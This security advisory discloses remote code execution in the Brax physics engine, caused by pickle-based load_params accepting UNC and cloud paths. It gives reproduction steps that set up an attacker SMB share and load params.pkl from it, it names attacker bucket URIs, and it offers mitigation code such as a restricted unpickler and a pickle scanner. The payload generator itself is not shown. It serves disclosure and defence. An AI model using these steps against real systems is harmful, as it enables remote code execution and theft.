Full Disclosure ID: HA-2026-00123

Brax - Version 0.14.2 / Remote Code Execution (RCE) via Insecure Deserialization

Author: Joshua Provoste, Security Researcher
Published: June 01, 2026
Severity: 9.8 (CRITICAL)
Target: Brax / Physics Simulation & Reinforcement Learning

The following proof of concept (PoC) shows one way to reproduce RCE in Brax using an attacker-controlled SMB share. No local access to the victim machine is needed to plant or modify the file that triggers code execution during deserialization.

The PoC uses two devices to simulate the interaction: an attacking machine (Raspberry Pi, IP 192.168.1.90) and a victim machine (Windows, IP 192.168.1.88).

Note: This vulnerability was verified and reported against version 0.14.2, but earlier and later versions may also be affected by the same insecure deserialization vector.

Introduction


Brax is a free, open-source physics engine designed by Google for high-performance simulation of rigid bodies, articulated joints, and contact dynamics. Built entirely on top of JAX, it runs natively on accelerators (GPUs and TPUs) and is optimized for massive parallelization. It is predominantly used in reinforcement learning (RL) and robotics research to train control policies significantly faster than traditional CPU-bound simulators.

Brax matters because it can run millions of simulation steps per second, letting researchers evaluate complex robotics and control tasks in a fraction of the usual time. Because parameter files are commonly shared across collaborative pipelines and research hubs, a security flaw in its data-loading utilities poses a significant risk to the AI research ecosystem.

[Figures: example Brax simulations (A1, Ant, Ant v2, Fetch, Grasp, HalfCheetah, Humanoid, Humanoid v2, UR5e)]

Vulnerability description

An insecure deserialization vulnerability exists in the brax.io.model.load_params function. This utility loads trained model parameters using Python's pickle module. pickle is inherently unsafe for untrusted input: the byte stream can instruct the loader to import and call arbitrary Python callables while it reconstructs objects.
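As a minimal, benign illustration of this behavior (not the payload used in this PoC): an object's __reduce__ method lets the author of a pickle name any importable callable and its arguments, and pickle.loads invokes that callable while loading. The Marker class below is hypothetical and deliberately uses the harmless built-in sorted.

```python
import pickle


class Marker:
    """Hypothetical class used only to illustrate __reduce__."""

    def __reduce__(self):
        # Tells pickle: "to rebuild this object, call sorted([3, 1, 2])".
        # A hostile file could name any importable callable here instead.
        return (sorted, ([3, 1, 2],))


payload = pickle.dumps(Marker())

# loads() calls the callable named in the byte stream. The result is whatever
# that call returns, not a Marker instance.
result = pickle.loads(payload)
print(type(result).__name__, result)
```

The caller asked only to "load data", yet a function chosen by the file's author ran inside the loading process.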

The exposure is widened by the use of the etils.epath library. epath.Path().open() is backend-agnostic: it resolves remote URIs such as gs:// or s3:// when the corresponding backends are installed, and on Windows it also accepts UNC paths (\\host\share), which the operating system resolves natively. An attacker can therefore supply a path that points to a remotely hosted malicious .pkl file. When a user or an automated process calls load_params with an untrusted path, the system fetches and deserializes the file, leading to full Remote Code Execution (RCE).
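A caller that must accept paths from outside could reject remote locations before they ever reach the loader. The sketch below is one possible pre-check, not part of Brax or etils; the function name is_remote_path is hypothetical, and the check is purely syntactic.

```python
import re

# Matches a URI scheme followed by "://", e.g. gs://, s3://, http://
_URI_SCHEME = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*://")


def is_remote_path(path: str) -> bool:
    """Return True for URI-style paths and for UNC paths (hypothetical helper)."""
    if _URI_SCHEME.match(path):
        return True
    # UNC paths begin with two backslashes or two forward slashes:
    # \\host\share\file or //host/share/file
    return path.startswith(("\\\\", "//"))


for candidate in (
    r"\\192.168.1.90\lab_share\params.pkl",
    "gs://malicious-bucket/payload.pkl",
    "checkpoints/params.pkl",
):
    print(candidate, "->", "remote" if is_remote_path(candidate) else "local")
```

A check like this is only a first filter. A mapped network drive (for example Z:) or a mounted share looks like a local path and would pass it, so it does not make pickle-based loading safe on its own.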

The vulnerable code in brax/io/model.py:

Python (model.py) Vulnerable Loader
def load_params(path: str) -> Any:
  with epath.Path(path).open('rb') as fin:
    buf = fin.read()
  return pickle.loads(buf)
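For contrast, the Python pickle documentation describes a hardening pattern in which pickle.Unpickler is subclassed and find_class is overridden so that only allow-listed globals can be resolved. The sketch below follows that pattern. It is not Brax code: the names ALLOWED_GLOBALS, RestrictedUnpickler and restricted_loads are hypothetical, and the allow-list shown is a placeholder (real parameter files would presumably need additional array-related entries).

```python
import io
import pickle

# Hypothetical allow-list: the only globals a parameter file may reference.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve globals outside the allow-list."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is not allowed")


def restricted_loads(buf: bytes):
    """Drop-in analogue of pickle.loads that enforces the allow-list."""
    return RestrictedUnpickler(io.BytesIO(buf)).load()


# Plain containers and numbers need no globals, so they load normally.
print(restricted_loads(pickle.dumps({"w": [1.0, 2.0]})))
```

An allow-list narrows what a file can reference, but it is only as safe as its entries, so a non-executable format remains the more robust choice for untrusted inputs.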

Technical Impact Analysis

Project Purpose & Context

Brax is a differentiable physics engine written in JAX, designed for high-performance Reinforcement Learning (RL) and robotics simulation. It is widely used by researchers and developers at Google and across the global AI community for training complex neural network policies in physics-based environments.

Platform & Deployment Environment

Brax primarily operates in research and development environments, often deployed via Jupyter or Colab notebooks. It is also integrated into large-scale distributed training clusters (using GPUs and TPUs) and MLOps pipelines (e.g., Vertex AI) where model parameters are frequently shared and loaded across different infrastructure components.

Comprehensive Risk Assessment

The vulnerability is rated as Critical. While Brax supports secure checkpointing through Orbax, the brax.io.model module provides a high-convenience pickle-based loading utility that is prominently featured in official tutorials and research workflows. This creates a significant "Supply Chain" and "Remote Control" surface: an attacker can achieve RCE by merely convincing a researcher to load a pre-trained model path, or by influencing a configuration flag in an automated pipeline.

Attack Scenario

Who would exploit this vulnerability?

Malicious actors targeting AI/ML research institutions, data scientists, or organizations running significant cloud-based simulation infrastructure. This includes attackers seeking to steal intellectual property (proprietary models/datasets) or those looking to hijack expensive compute resources (TPU pods).

For what gain?

The primary gain is arbitrary code execution on high-performance compute nodes. This enables data theft, credential harvesting from environment variables, and lateral movement across research clusters. In cloud environments, it can lead to full compromise of the researcher's workstation or the orchestration layer.

In what way?

Attackers can distribute malicious "optimized" models on platforms like GitHub or Hugging Face, or exploit MLOps systems that accept path parameters from untrusted inputs. By providing a path to a remote share (SMB) or a cloud bucket (GCS/S3), they force the victim's system to act as a client that downloads and executes their payload.

Reproduction steps

On the Raspberry (attacker) - IP 192.168.1.90

kw0@kw0l4b:~ $ hostname -I | awk '{print $1}'
192.168.1.90

Shared Resource Configuration (SMB):

1. Install Samba: sudo apt update && sudo apt install samba samba-common-bin -y
2. Prepare the attack directory:

mkdir ~/lab_attack
chmod 755 /home/kw0  # Allows Samba to access the HOME
chmod -R 777 ~/lab_attack

3. Configure Samba: Add to the end of /etc/samba/smb.conf:

[lab_share]
path = /home/kw0/lab_attack
read only = no
guest ok = yes
force user = kw0

4. **Payload Generation on the Raspberry**: Run the specialized exploit.py script to generate the params.pkl file directly in the shared path:

python exploit.py
[Screenshot: payload generation output]

On Windows (victim) - IP 192.168.1.88

PS L:\HTTP_Code_Filleter\OT2\brax> Get-NetIPAddress -AddressFamily IPv4 | Where-Object PrefixOrigin -eq "Dhcp" | Select-Object -ExpandProperty IPAddress
192.168.1.88

Technical Requirements

  • Operating System: Windows (for native resolution of UNC paths and network drives).
  • Environment: Python 3.x with the core dependencies (brax, etils[epath], jax).
  • Setup: No GPU/TPU is required to reproduce the security flaw; a CPU-only environment is sufficient.
  • Dependency Installation:
    # orbax-checkpoint < 0.11.33 is required due to uvloop incompatibility on Windows
    pip install "orbax-checkpoint<0.11.33" brax etils[epath] jax

1. **Remove any previous drive mapping**: net use Z: /delete
2. **Map the attacker's share as a network drive**:

net use Z: \\192.168.1.90\lab_share /persistent:no

3. **Launch deserialization**:
python -c "from brax.io import model; model.load_params(r'\\192.168.1.90\lab_share\params.pkl')"

[Screenshot: exploit confirmation pop-up]

Other attacker-controllable remote RCE vectors in Brax

1. File System Abstraction: etils.epath

The most critical entry point is brax.io.model.load_params(path). Rather than using the built-in open(), Brax opens the file with epath.Path(path).open('rb').

Locality Bypass: The etils.epath library is designed to be backend-agnostic. If the environment has the necessary drivers installed (such as tensorflow-io or gcsfs), an attacker can provide remote URIs like gs://malicious-bucket/payload.pkl or s3://attacker-models/exploit.pkl. If a Brax-based application accepts a model path from an API or configuration, the server itself will act as a client, download the payload from the attacker's bucket, and execute it via pickle.loads.

2. Supply Chain Model Poisoning

Brax integrates closely with model repositories like mujoco_menagerie.

The "Pre-trained Model" Vector: Official tutorials explicitly encourage the use of model.load_params to load trained policies. An attacker can publish an "optimized" model in RL communities (GitHub, Hugging Face, etc.). To the user, loading params.pkl looks like a plain data-loading operation, but the payload executes the moment the file is loaded, compromising the environment.
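A downloaded file can be inspected without being loaded. The sketch below uses the standard pickletools.genops iterator to list the globals a pickle stream references, which is where a hostile callable would have to appear. The function name referenced_globals is hypothetical, and the STACK_GLOBAL handling is a heuristic (it pairs the two most recent string constants), so treat the output as a triage aid rather than a guarantee.

```python
import pickle
import pickletools


def referenced_globals(buf: bytes) -> set:
    """List 'module.name' globals named in a pickle, without executing it."""
    found = set()
    strings = []  # string constants seen so far, used for STACK_GLOBAL
    for opcode, arg, _pos in pickletools.genops(buf):
        if opcode.name == "GLOBAL":
            # genops reports the argument as "module name"
            found.add(arg.replace(" ", "."))
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            # Heuristic: module and name are the last two strings pushed
            found.add(f"{strings[-2]}.{strings[-1]}")
        elif isinstance(arg, str):
            strings.append(arg)
    return found


class Marker:
    """Hypothetical stand-in for an object whose pickle names a callable."""

    def __reduce__(self):
        return (sorted, ([3, 1, 2],))


print(referenced_globals(pickle.dumps(Marker())))
print(referenced_globals(pickle.dumps({"w": [1.0, 2.0]})))
```

A file of plain containers and numbers references no globals at all, so any unexpected entry such as an os, subprocess or builtins callable is a strong signal that the file should not be loaded.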

3. Injection via Configuration Flags (absl-py)

The main training script brax/training/learner.py exposes flags such as --restoredir. In **MLOps** deployments (Kubernetes, Vertex AI), training parameters are often passed through environment variables or dynamically generated CLI arguments. If an attacker can influence the orchestration configuration, they can force the loading of a checkpoint from an arbitrary location.
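One way a pipeline could limit this vector is to confine any flag-supplied path to a directory it trusts before passing it on. The sketch below is an assumption-laden illustration rather than Brax code: is_within_root and the example directories are hypothetical.

```python
from pathlib import Path


def is_within_root(candidate: str, trusted_root: str) -> bool:
    """Return True only if candidate resolves to a location under trusted_root."""
    root = Path(trusted_root).resolve()
    target = Path(candidate).resolve()  # collapses ".." and follows symlinks
    return target == root or root in target.parents


# Hypothetical checkpoint root for illustration.
print(is_within_root("/srv/ckpt/run1/params.pkl", "/srv/ckpt"))
print(is_within_root("/srv/ckpt/../other/params.pkl", "/srv/ckpt"))
```

Resolving before comparing matters: a plain string prefix check would accept the second path even though it escapes the trusted directory.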

4. Persistence and Lateral Movement in JAX Clusters

In distributed computing environments (TPU/GPU pods), an attacker who compromises a single node or shared storage (NFS/Cloud Bucket) can replace a parameter .pkl file. When other nodes in the cluster or evaluation processes attempt to load the parameters to continue the simulation, the exploit propagates throughout the cluster, facilitating lateral movement.
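Tampering of this kind can be detected if each node checks the file's digest against a value recorded when the parameters were written. A minimal sketch, assuming the expected SHA-256 digest is distributed through a channel the attacker cannot modify (the function name matches_digest is hypothetical):

```python
import hashlib
import hmac


def matches_digest(buf: bytes, expected_sha256_hex: str) -> bool:
    """Compare the SHA-256 of buf with an expected hex digest."""
    actual = hashlib.sha256(buf).hexdigest()
    # compare_digest avoids leaking where the two strings first differ
    return hmac.compare_digest(actual, expected_sha256_hex.lower())


original = b"trained-parameters"
recorded = hashlib.sha256(original).hexdigest()  # stored at save time

print(matches_digest(original, recorded))
print(matches_digest(b"replaced-by-attacker", recorded))
```

The check must run on the raw bytes before any deserialization. If the digest is stored next to the file on the same writable share, an attacker can replace both, and the check provides no protection.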


Executive Summary: RCE via Insecure Deserialization and UNC Path Injection in Brax

The research identifies a critical Remote Code Execution (RCE) vulnerability in the Brax physics engine (v0.14.2), specifically within its model loading utility.

  • Root Cause: The brax.io.model.load_params function utilizes pickle to deserialize model parameters from file paths. Furthermore, it leverages etils.epath to open these paths, which transparently supports remote protocols including Windows UNC paths (\\) and cloud storage URIs.
  • Exploitation Mechanism: By providing a malicious path pointing to an attacker-controlled SMB share or remote bucket, an attacker can force the Brax engine to fetch and deserialize a crafted pickle payload. This deserialization process executes arbitrary code in the context of the application process.

Analysis of Scope and Security Implications

This vulnerability is of critical severity, as it targets the core data-loading mechanism used in distributed reinforcement learning and physics simulations.

1. Infection Scenarios

  • Supply Chain Poisoning: Attackers can publish "optimized" models on platforms like GitHub or Hugging Face. Researchers following official Brax tutorials to load these models will trigger the RCE implicitly during standard load_params calls.
  • Distributed Training Compromise: In large-scale training clusters, an attacker with access to shared storage (NFS/Cloud Buckets) can replace parameter files. Every node or evaluation pipeline that later loads these parameters executes the payload, enabling lateral movement across the cluster.

2. Factors Exacerbating Risk